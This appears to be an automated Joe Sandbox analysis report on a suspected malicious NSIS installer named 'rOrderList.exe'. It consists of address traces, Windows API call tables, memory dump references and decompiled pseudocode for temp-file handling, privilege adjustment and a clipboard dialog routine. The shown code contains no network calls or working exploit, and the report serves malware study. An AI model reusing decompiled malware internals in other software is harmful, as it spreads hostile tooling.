                                                                                      0x00000000
                                                                                      0x00403ae1
                                                                                      0x00403ae7
                                                                                      0x00403ae9
                                                                                      0x00403aeb
                                                                                      0x00403afa
                                                                                      0x00403afc
                                                                                      0x00000000
                                                                                      0x00403afc
                                                                                      0x00000000
                                                                                      0x00403aeb
                                                                                      0x00403adf
                                                                                      0x00403966
                                                                                      0x0040396d
                                                                                      0x0040396d
                                                                                      0x004038a2
                                                                                      0x00403937
                                                                                      0x00403937
                                                                                      0x00403943
                                                                                      0x00000000
                                                                                      0x00403943
                                                                                      0x004038af
                                                                                      0x004038b3
                                                                                      0x00403901
                                                                                      0x00403901
                                                                                      0x00403903
                                                                                      0x0040390b
                                                                                      0x0040397e
                                                                                      0x00403980
                                                                                      0x00403987
                                                                                      0x0040398f
                                                                                      0x0040398f
                                                                                      0x0040399a
                                                                                      0x0040399f
                                                                                      0x004039ae
                                                                                      0x004039b2
                                                                                      0x004039b3
                                                                                      0x004039bc
                                                                                      0x004039b5
                                                                                      0x004039b5
                                                                                      0x004039b5
                                                                                      0x004039c2
                                                                                      0x004039c8
                                                                                      0x004039cf
                                                                                      0x004039d7
                                                                                      0x004039d7
                                                                                      0x004039e5
                                                                                      0x004039f1
                                                                                      0x004039ff
                                                                                      0x00403a04
                                                                                      0x00403a0a
                                                                                      0x00403a16
                                                                                      0x00403a1c
                                                                                      0x00403a26
                                                                                      0x00403a3c
                                                                                      0x00403a4d
                                                                                      0x00403a53
                                                                                      0x00403a5a
                                                                                      0x00403a5d
                                                                                      0x00403a63
                                                                                      0x00403a63
                                                                                      0x00403a5a
                                                                                      0x00403a67
                                                                                      0x00403a6e
                                                                                      0x00403a6e
                                                                                      0x00403a73
                                                                                      0x00403a73
                                                                                      0x00000000
                                                                                      0x004039ae
                                                                                      0x0040390d
                                                                                      0x00403910
                                                                                      0x0040391b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403923
                                                                                      0x0040392e
                                                                                      0x00403933
                                                                                      0x00000000
                                                                                      0x00403933
                                                                                      0x004038bc
                                                                                      0x004038d4
                                                                                      0x004038e5
                                                                                      0x004038e6
                                                                                      0x004038ea
                                                                                      0x004038ec
                                                                                      0x004038fa
                                                                                      0x004038fd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004038fd
                                                                                      0x004038ff
                                                                                      0x00000000
                                                                                      0x004038ff
                                                                                      0x0040382c
                                                                                      0x00403838
                                                                                      0x0040383d
                                                                                      0x00403842
                                                                                      0x00403844
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040384c
                                                                                      0x00403854
                                                                                      0x00403865
                                                                                      0x0040386d
                                                                                      0x0040386f
                                                                                      0x00403874
                                                                                      0x00403876
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004036f9
                                                                                      0x004036f9
                                                                                      0x004036fb
                                                                                      0x004036ff
                                                                                      0x00403708
                                                                                      0x0040370c
                                                                                      0x00403711
                                                                                      0x00403712
                                                                                      0x00403712
                                                                                      0x00403717
                                                                                      0x00000000
                                                                                      0x0040371d
                                                                                      0x0040371e
                                                                                      0x00403723
                                                                                      0x00403725
                                                                                      0x0040372d
                                                                                      0x00403734
                                                                                      0x00403734
                                                                                      0x0040372d
                                                                                      0x00403745
                                                                                      0x00403758
                                                                                      0x00403759
                                                                                      0x0040376e
                                                                                      0x00403773
                                                                                      0x00403777
                                                                                      0x00403780
                                                                                      0x00403788
                                                                                      0x0040378f
                                                                                      0x0040378f
                                                                                      0x00403788
                                                                                      0x0040379b
                                                                                      0x004037ae
                                                                                      0x004037af
                                                                                      0x004037c4
                                                                                      0x004037ca
                                                                                      0x004037ce
                                                                                      0x00000000
                                                                                      0x004037f5
                                                                                      0x004037f5
                                                                                      0x004037fa
                                                                                      0x00403803
                                                                                      0x00403808
                                                                                      0x00403808
                                                                                      0x00000000
                                                                                      0x00403808
                                                                                      0x004037ce
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00403701
                                                                                      0x00403701
                                                                                      0x00403702
                                                                                      0x00403703
                                                                                      0x00000000
                                                                                      0x004037d6
                                                                                      0x004037dd
                                                                                      0x004037e3
                                                                                      0x004037e6
                                                                                      0x004037e6
                                                                                      0x004037e7
                                                                                      0x004037ea
                                                                                      0x00000000
                                                                                      0x004037f3
                                                                                      0x0040362d
                                                                                      0x0040362e
                                                                                      0x0040363a
                                                                                      0x00403641
                                                                                      0x00000000
                                                                                      0x00403643
                                                                                      0x00403645
                                                                                      0x00403653
                                                                                      0x00403658
                                                                                      0x0040365f
                                                                                      0x00403663
                                                                                      0x00403667
                                                                                      0x00403669
                                                                                      0x00403669
                                                                                      0x00403667
                                                                                      0x00000000
                                                                                      0x0040365f

                                                                                      APIs
                                                                                      • SetErrorMode.KERNELBASE ref: 004035FB
                                                                                      • GetVersion.KERNEL32 ref: 00403601
                                                                                      • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403634
                                                                                      • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 00403671
                                                                                      • OleInitialize.OLE32(00000000), ref: 00403678
                                                                                      • SHGetFileInfoW.SHELL32(00421708,00000000,?,000002B4,00000000), ref: 00403694
                                                                                      • GetCommandLineW.KERNEL32(00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 004036A9
                                                                                      • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rOrderList.exe",00000020,"C:\Users\user\Desktop\rOrderList.exe",00000000,?,00000007,00000009,0000000B), ref: 004036E1
                                                                                        • Part of subcall function 00406931: GetModuleHandleA.KERNEL32(?,00000020,?,0040364A,0000000B), ref: 00406943
                                                                                        • Part of subcall function 00406931: GetProcAddress.KERNEL32(00000000,?), ref: 0040695E
                                                                                      • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040381B
                                                                                      • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 0040382C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403838
                                                                                      • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040384C
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403854
                                                                                      • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403865
                                                                                      • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040386D
                                                                                      • DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403881
                                                                                        • Part of subcall function 0040653C: lstrcpynW.KERNEL32(?,?,00000400,004036A9,00429260,NSIS Error,?,00000007,00000009,0000000B), ref: 00406549
                                                                                      • ExitProcess.KERNEL32(00000007,?,00000007,00000009,0000000B), ref: 00403947
                                                                                      • OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 0040394C
                                                                                      • ExitProcess.KERNEL32 ref: 0040396D
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 00403980
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 0040398F
                                                                                      • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 0040399A
                                                                                      • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rOrderList.exe",00000000,00000007,?,00000007,00000009,0000000B), ref: 004039A6
                                                                                      • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004039C2
                                                                                      • DeleteFileW.KERNEL32(00420F08,00420F08,?,0042B000,00000009,?,00000007,00000009,0000000B), ref: 00403A1C
                                                                                      • CopyFileW.KERNEL32(00438800,00420F08,00000001,?,00000007,00000009,0000000B), ref: 00403A30
                                                                                      • CloseHandle.KERNEL32(00000000,00420F08,00420F08,?,00420F08,00000000,?,00000007,00000009,0000000B), ref: 00403A5D
                                                                                      • GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403A8C
                                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00403A93
                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403AA8
                                                                                      • AdjustTokenPrivileges.ADVAPI32 ref: 00403ACB
                                                                                      • ExitWindowsEx.USER32(00000002,80040002), ref: 00403AF0
                                                                                      • ExitProcess.KERNEL32 ref: 00403B13
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                      • String ID: "C:\Users\user\Desktop\rOrderList.exe"$.tmp$1033$C:\Users\user\AppData\Local\Interpartesforhold\Strengelege$C:\Users\user\AppData\Local\Interpartesforhold\Strengelege\Willness$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                      • API String ID: 424501083-2550474846
                                                                                      • Opcode ID: 31723189c3e0cc37918b4a8b1536ef0ceae5934114734107551c84643a007513
                                                                                      • Instruction ID: 2d933c795242ec911d1e8c81cb1b116df6d8be9c0bdf84dd3ae94b8088f318b1
                                                                                      • Opcode Fuzzy Hash: 31723189c3e0cc37918b4a8b1536ef0ceae5934114734107551c84643a007513
                                                                                      • Instruction Fuzzy Hash: 7CD1F6B1200310AAD720BF759D49B2B3AADEB40709F51443FF881B62D1DB7D8956C76E
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 137 4056e3-4056fe 138 405704-4057cb GetDlgItem * 3 call 4044c7 call 404e20 GetClientRect GetSystemMetrics SendMessageW * 2 137->138 139 40588d-405894 137->139 161 4057e9-4057ec 138->161 162 4057cd-4057e7 SendMessageW * 2 138->162 141 405896-4058b8 GetDlgItem CreateThread FindCloseChangeNotification 139->141 142 4058be-4058cb 139->142 141->142 144 4058e9-4058f3 142->144 145 4058cd-4058d3 142->145 146 4058f5-4058fb 144->146 147 405949-40594d 144->147 149 4058d5-4058e4 ShowWindow * 2 call 4044c7 145->149 150 40590e-405917 call 4044f9 145->150 152 405923-405933 ShowWindow 146->152 153 4058fd-405909 call 40446b 146->153 147->150 156 40594f-405955 147->156 149->144 158 40591c-405920 150->158 159 405943-405944 call 40446b 152->159 160 405935-40593e call 4055a4 152->160 153->150 156->150 163 405957-40596a SendMessageW 156->163 159->147 160->159 164 4057fc-405813 call 404492 161->164 165 4057ee-4057fa SendMessageW 161->165 162->161 166 405970-40599b CreatePopupMenu call 406579 AppendMenuW 163->166 167 405a6c-405a6e 163->167 176 405815-405829 ShowWindow 164->176 177 405849-40586a GetDlgItem SendMessageW 164->177 165->164 174 4059b0-4059c5 TrackPopupMenu 166->174 175 40599d-4059ad GetWindowRect 166->175 167->158 174->167 178 4059cb-4059e2 174->178 175->174 179 405838 176->179 180 40582b-405836 ShowWindow 176->180 177->167 181 405870-405888 SendMessageW * 2 177->181 182 4059e7-405a02 SendMessageW 178->182 183 40583e-405844 call 4044c7 179->183 180->183 181->167 182->182 184 405a04-405a27 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 182->184 183->177 186 405a29-405a50 SendMessageW 184->186 186->186 187 405a52-405a66 GlobalUnlock SetClipboardData CloseClipboard 186->187 187->167
                                                                                      C-Code - Quality: 95%
                                                                                      			E004056E3(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                      				struct HWND__* _v8;
                                                                                      				long _v12;
                                                                                      				struct tagRECT _v28;
                                                                                      				void* _v36;
                                                                                      				signed int _v40;
                                                                                      				int _v44;
                                                                                      				int _v48;
                                                                                      				signed int _v52;
                                                                                      				int _v56;
                                                                                      				void* _v60;
                                                                                      				void* _v68;
                                                                                      				void* __ebx;
                                                                                      				void* __edi;
                                                                                      				void* __esi;
                                                                                      				struct HWND__* _t94;
                                                                                      				long _t95;
                                                                                      				int _t100;
                                                                                      				void* _t108;
                                                                                      				intOrPtr _t119;
                                                                                      				void* _t127;
                                                                                      				intOrPtr _t130;
                                                                                      				struct HWND__* _t134;
                                                                                      				int _t156;
                                                                                      				int _t159;
                                                                                      				struct HMENU__* _t164;
                                                                                      				struct HWND__* _t168;
                                                                                      				struct HWND__* _t169;
                                                                                      				int _t171;
                                                                                      				void* _t172;
                                                                                      				short* _t173;
                                                                                      				short* _t175;
                                                                                      				int _t177;
                                                                                      
                                                                                      				_t169 =  *0x429244;
                                                                                      				_t156 = 0;
                                                                                      				_v8 = _t169;
                                                                                      				if(_a8 != 0x110) {
                                                                                      					if(_a8 == 0x405) {
                                                                                      						_t127 = CreateThread(0, 0, E00405677, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                      						FindCloseChangeNotification(_t127); // executed
                                                                                      					}
                                                                                      					if(_a8 != 0x111) {
                                                                                      						L17:
                                                                                      						_t171 = 1;
                                                                                      						if(_a8 != 0x404) {
                                                                                      							L25:
                                                                                      							if(_a8 != 0x7b) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t94 = _v8;
                                                                                      							if(_a12 != _t94) {
                                                                                      								goto L20;
                                                                                      							}
                                                                                      							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                      							_a8 = _t95;
                                                                                      							if(_t95 <= _t156) {
                                                                                      								L36:
                                                                                      								return 0;
                                                                                      							}
                                                                                      							_t164 = CreatePopupMenu();
                                                                                      							AppendMenuW(_t164, _t156, _t171, E00406579(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                      							_t100 = _a16;
                                                                                      							_t159 = _a16 >> 0x10;
                                                                                      							if(_a16 == 0xffffffff) {
                                                                                      								GetWindowRect(_v8,  &_v28);
                                                                                      								_t100 = _v28.left;
                                                                                      								_t159 = _v28.top;
                                                                                      							}
                                                                                      							if(TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156) == _t171) {
                                                                                      								_v60 = _t156;
                                                                                      								_v48 = 0x423748;
                                                                                      								_v44 = 0x1000;
                                                                                      								_a4 = _a8;
                                                                                      								do {
                                                                                      									_a4 = _a4 - 1;
                                                                                      									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
                                                                                      								} while (_a4 != _t156);
                                                                                      								OpenClipboard(_t156);
                                                                                      								EmptyClipboard();
                                                                                      								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                      								_a4 = _t108;
                                                                                      								_t172 = GlobalLock(_t108);
                                                                                      								do {
                                                                                      									_v48 = _t172;
                                                                                      									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                      									 *_t173 = 0xd;
                                                                                      									_t175 = _t173 + 2;
                                                                                      									 *_t175 = 0xa;
                                                                                      									_t172 = _t175 + 2;
                                                                                      									_t156 = _t156 + 1;
                                                                                      								} while (_t156 < _a8);
                                                                                      								GlobalUnlock(_a4);
                                                                                      								SetClipboardData(0xd, _a4);
                                                                                      								CloseClipboard();
                                                                                      							}
                                                                                      							goto L36;
                                                                                      						}
                                                                                      						if( *0x42922c == _t156) {
                                                                                      							ShowWindow( *0x42a268, 8); // executed
                                                                                      							if( *0x42a30c == _t156) {
                                                                                      								_t119 =  *0x422720; // 0x51f64c
                                                                                      								E004055A4( *((intOrPtr*)(_t119 + 0x34)), _t156);
                                                                                      							}
                                                                                      							E0040446B(_t171);
                                                                                      							goto L25;
                                                                                      						}
                                                                                      						 *0x421f18 = 2;
                                                                                      						E0040446B(0x78);
                                                                                      						goto L20;
                                                                                      					} else {
                                                                                      						if(_a12 != 0x403) {
                                                                                      							L20:
                                                                                      							return E004044F9(_a8, _a12, _a16);
                                                                                      						}
                                                                                      						ShowWindow( *0x429230, _t156);
                                                                                      						ShowWindow(_t169, 8);
                                                                                      						E004044C7(_t169);
                                                                                      						goto L17;
                                                                                      					}
                                                                                      				}
                                                                                      				_v52 = _v52 | 0xffffffff;
                                                                                      				_v40 = _v40 | 0xffffffff;
                                                                                      				_t177 = 2;
                                                                                      				_v60 = _t177;
                                                                                      				_v56 = 0;
                                                                                      				_v48 = 0;
                                                                                      				_v44 = 0;
                                                                                      				asm("stosd");
                                                                                      				asm("stosd");
                                                                                      				_t130 =  *0x42a274;
                                                                                      				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                      				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                      				 *0x429230 = GetDlgItem(_a4, 0x403);
                                                                                      				 *0x429228 = GetDlgItem(_a4, 0x3ee);
                                                                                      				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                      				 *0x429244 = _t134;
                                                                                      				_v8 = _t134;
                                                                                      				E004044C7( *0x429230);
                                                                                      				 *0x429234 = E00404E20(4);
                                                                                      				 *0x42924c = 0;
                                                                                      				GetClientRect(_v8,  &_v28);
                                                                                      				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                      				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
                                                                                      				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                      				if(_a8 >= 0) {
                                                                                      					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                      					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                      				}
                                                                                      				if(_a12 >= _t156) {
                                                                                      					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                      				}
                                                                                      				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                      				_push(0x1b);
                                                                                      				E00404492(_a4);
                                                                                      				if(( *0x42a27c & 0x00000003) != 0) {
                                                                                      					ShowWindow( *0x429230, _t156);
                                                                                      					if(( *0x42a27c & 0x00000002) != 0) {
                                                                                      						 *0x429230 = _t156;
                                                                                      					} else {
                                                                                      						ShowWindow(_v8, 8);
                                                                                      					}
                                                                                      					E004044C7( *0x429228);
                                                                                      				}
                                                                                      				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                      				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                      				if(( *0x42a27c & 0x00000004) != 0) {
                                                                                      					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                      					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                      				}
                                                                                      				goto L36;
                                                                                      			}



































                                                                                      0x004056eb
                                                                                      0x004056f1
                                                                                      0x004056fb
                                                                                      0x004056fe
                                                                                      0x00405894
                                                                                      0x004058b1
                                                                                      0x004058b8
                                                                                      0x004058b8
                                                                                      0x004058cb
                                                                                      0x004058e9
                                                                                      0x004058eb
                                                                                      0x004058f3
                                                                                      0x00405949
                                                                                      0x0040594d
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040594f
                                                                                      0x00405955
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0040595f
                                                                                      0x00405967
                                                                                      0x0040596a
                                                                                      0x00405a6c
                                                                                      0x00000000
                                                                                      0x00405a6c
                                                                                      0x00405979
                                                                                      0x00405984
                                                                                      0x0040598d
                                                                                      0x00405998
                                                                                      0x0040599b
                                                                                      0x004059a4
                                                                                      0x004059aa
                                                                                      0x004059ad
                                                                                      0x004059ad
                                                                                      0x004059c5
                                                                                      0x004059ce
                                                                                      0x004059d1
                                                                                      0x004059d8
                                                                                      0x004059df
                                                                                      0x004059e7
                                                                                      0x004059e7
                                                                                      0x004059fe
                                                                                      0x004059fe
                                                                                      0x00405a05
                                                                                      0x00405a0b
                                                                                      0x00405a17
                                                                                      0x00405a1e
                                                                                      0x00405a27
                                                                                      0x00405a29
                                                                                      0x00405a2c
                                                                                      0x00405a3b
                                                                                      0x00405a3e
                                                                                      0x00405a44
                                                                                      0x00405a45
                                                                                      0x00405a4b
                                                                                      0x00405a4c
                                                                                      0x00405a4d
                                                                                      0x00405a55
                                                                                      0x00405a60
                                                                                      0x00405a66
                                                                                      0x00405a66
                                                                                      0x00000000
                                                                                      0x004059c5
                                                                                      0x004058fb
                                                                                      0x0040592b
                                                                                      0x00405933
                                                                                      0x00405935
                                                                                      0x0040593e
                                                                                      0x0040593e
                                                                                      0x00405944
                                                                                      0x00000000
                                                                                      0x00405944
                                                                                      0x004058ff
                                                                                      0x00405909
                                                                                      0x00000000
                                                                                      0x004058cd
                                                                                      0x004058d3
                                                                                      0x0040590e
                                                                                      0x00000000
                                                                                      0x00405917
                                                                                      0x004058dc
                                                                                      0x004058e1
                                                                                      0x004058e4
                                                                                      0x00000000
                                                                                      0x004058e4
                                                                                      0x004058cb
                                                                                      0x00405704
                                                                                      0x00405708
                                                                                      0x00405710
                                                                                      0x00405714
                                                                                      0x00405717
                                                                                      0x0040571a
                                                                                      0x0040571d
                                                                                      0x00405720
                                                                                      0x00405721
                                                                                      0x00405722
                                                                                      0x0040573b
                                                                                      0x0040573e
                                                                                      0x00405748
                                                                                      0x00405757
                                                                                      0x0040575f
                                                                                      0x00405767
                                                                                      0x0040576c
                                                                                      0x0040576f
                                                                                      0x0040577b
                                                                                      0x00405784
                                                                                      0x0040578d
                                                                                      0x004057af
                                                                                      0x004057b5
                                                                                      0x004057c6
                                                                                      0x004057cb
                                                                                      0x004057d9
                                                                                      0x004057e7
                                                                                      0x004057e7
                                                                                      0x004057ec
                                                                                      0x004057fa
                                                                                      0x004057fa
                                                                                      0x004057ff
                                                                                      0x00405802
                                                                                      0x00405807
                                                                                      0x00405813
                                                                                      0x0040581c
                                                                                      0x00405829
                                                                                      0x00405838
                                                                                      0x0040582b
                                                                                      0x00405830
                                                                                      0x00405830
                                                                                      0x00405844
                                                                                      0x00405844
                                                                                      0x00405858
                                                                                      0x00405861
                                                                                      0x0040586a
                                                                                      0x0040587a
                                                                                      0x00405886
                                                                                      0x00405886
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • GetDlgItem.USER32(?,00000403), ref: 00405741
                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 00405750
                                                                                      • GetClientRect.USER32(?,?), ref: 0040578D
                                                                                      • GetSystemMetrics.USER32(00000002), ref: 00405794
                                                                                      • SendMessageW.USER32(?,00001061,00000000,?), ref: 004057B5
                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004057C6
                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004057D9
                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004057E7
                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 004057FA
                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040581C
                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405830
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405851
                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405861
                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040587A
                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405886
                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 0040575F
                                                                                        • Part of subcall function 004044C7: SendMessageW.USER32(00000028,?,00000001,004042F2), ref: 004044D5
                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004058A3
                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005677,00000000), ref: 004058B1
                                                                                      • FindCloseChangeNotification.KERNELBASE(00000000), ref: 004058B8
                                                                                      • ShowWindow.USER32(00000000), ref: 004058DC
                                                                                      • ShowWindow.USER32(?,00000008), ref: 004058E1
                                                                                      • ShowWindow.USER32(00000008), ref: 0040592B
                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040595F
                                                                                      • CreatePopupMenu.USER32 ref: 00405970
                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405984
                                                                                      • GetWindowRect.USER32(?,?), ref: 004059A4
                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004059BD
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 004059F5
                                                                                      • OpenClipboard.USER32(00000000), ref: 00405A05
                                                                                      • EmptyClipboard.USER32 ref: 00405A0B
                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405A17
                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405A21
                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405A35
                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405A55
                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405A60
                                                                                      • CloseClipboard.USER32 ref: 00405A66
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.795435115.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.795409890.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795486709.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795521991.000000000044F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.795879663.0000000000490000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_rOrderList.jbxd
                                                                                      Similarity
                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendChangeClientDataEmptyFindLockMetricsNotificationOpenSystemThreadTrackUnlock
                                                                                      • String ID: H7B${
                                                                                      • API String ID: 4154960007-2256286769
                                                                                      • Opcode ID: 7f1b4fbaea1f9537c7032c65b1d046410de350612eb5f29c045accd7e801de98
                                                                                      • Instruction ID: babe9631ed489b332455c35fc9929fd6d80e8fe82f7b5f1866f1dd344d2d825a
                                                                                      • Opcode Fuzzy Hash: 7f1b4fbaea1f9537c7032c65b1d046410de350612eb5f29c045accd7e801de98
                                                                                      • Instruction Fuzzy Hash: C9B159B1900608FFDF11AFA0DD85AAE7B79FB48354F00847AFA41A61A0CB754E51DF68
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
